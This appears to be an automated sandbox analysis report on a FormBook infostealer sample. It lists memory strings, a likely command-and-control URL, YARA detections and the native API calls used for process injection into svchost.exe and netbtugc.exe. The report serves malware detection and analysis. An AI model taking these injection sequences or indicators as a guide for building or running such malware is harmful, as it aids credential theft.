            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2369285902.000000000789E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004BDA000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.000000000432A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4510433647.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.000000000426E000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C8ED6A
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C7AA57
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00CA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CA9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: BP-50C26_20241220_082241.exe, 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4eb160fc-4
            Source: BP-50C26_20241220_082241.exe, 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5640d895-3
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_55e43dfc-7
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7a47b206-e
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F30 NtCreateSection,2_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C60 NtCreateKey,2_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573090 NtSetValueKey,2_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D70 NtOpenThread,2_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F4340 NtSetContextThread,LdrInitializeThunk,4_2_030F4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F4650 NtSuspendThread,LdrInitializeThunk,4_2_030F4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2B60 NtClose,LdrInitializeThunk,4_2_030F2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_030F2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_030F2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030F2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2AD0 NtReadFile,LdrInitializeThunk,4_2_030F2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2AF0 NtWriteFile,LdrInitializeThunk,4_2_030F2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2F30 NtCreateSection,LdrInitializeThunk,4_2_030F2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2FB0 NtResumeThread,LdrInitializeThunk,4_2_030F2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2FE0 NtCreateFile,LdrInitializeThunk,4_2_030F2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_030F2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_030F2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_030F2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_030F2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_030F2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_030F2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2C60 NtCreateKey,LdrInitializeThunk,4_2_030F2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030F2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_030F2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F35C0 NtCreateMutant,LdrInitializeThunk,4_2_030F35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F39B0 NtGetContextThread,LdrInitializeThunk,4_2_030F39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2B80 NtQueryInformationFile,4_2_030F2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2AB0 NtWaitForSingleObject,4_2_030F2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2F60 NtCreateProcessEx,4_2_030F2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2F90 NtProtectVirtualMemory,4_2_030F2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2FA0 NtQuerySection,4_2_030F2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2E30 NtWriteVirtualMemory,4_2_030F2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2EA0 NtAdjustPrivilegesToken,4_2_030F2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2D00 NtSetInformationFile,4_2_030F2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2DB0 NtEnumerateKey,4_2_030F2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2C00 NtQueryInformationProcess,4_2_030F2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2CC0 NtQueryVirtualMemory,4_2_030F2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F2CF0 NtOpenProcess,4_2_030F2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F3010 NtOpenDirectoryObject,4_2_030F3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F3090 NtSetValueKey,4_2_030F3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F3D10 NtOpenProcessToken,4_2_030F3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F3D70 NtOpenThread,4_2_030F3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02827A70 NtReadFile,4_2_02827A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02827BE0 NtClose,4_2_02827BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02827B50 NtDeleteFile,4_2_02827B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02827920 NtCreateFile,4_2_02827920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02827D30 NtAllocateVirtualMemory,4_2_02827D30
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C7D5EB
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C7E8F6
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C820460_2_00C82046
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C180600_2_00C18060
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C782980_2_00C78298
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C4E4FF0_2_00C4E4FF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C4676B0_2_00C4676B
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00CA48730_2_00CA4873
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C1CAF00_2_00C1CAF0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C3CAA00_2_00C3CAA0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C2CC390_2_00C2CC39
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C46DD90_2_00C46DD9
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C191C00_2_00C191C0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C2B1190_2_00C2B119
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C313940_2_00C31394
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C317060_2_00C31706
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C3781B0_2_00C3781B
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C319B00_2_00C319B0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C2997D0_2_00C2997D
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C179200_2_00C17920
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C37A4A0_2_00C37A4A
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C37CA70_2_00C37CA7
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C31C770_2_00C31C77
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C49EEE0_2_00C49EEE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C9BE440_2_00C9BE44
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C31F320_2_00C31F32
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_014E2F000_2_014E2F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
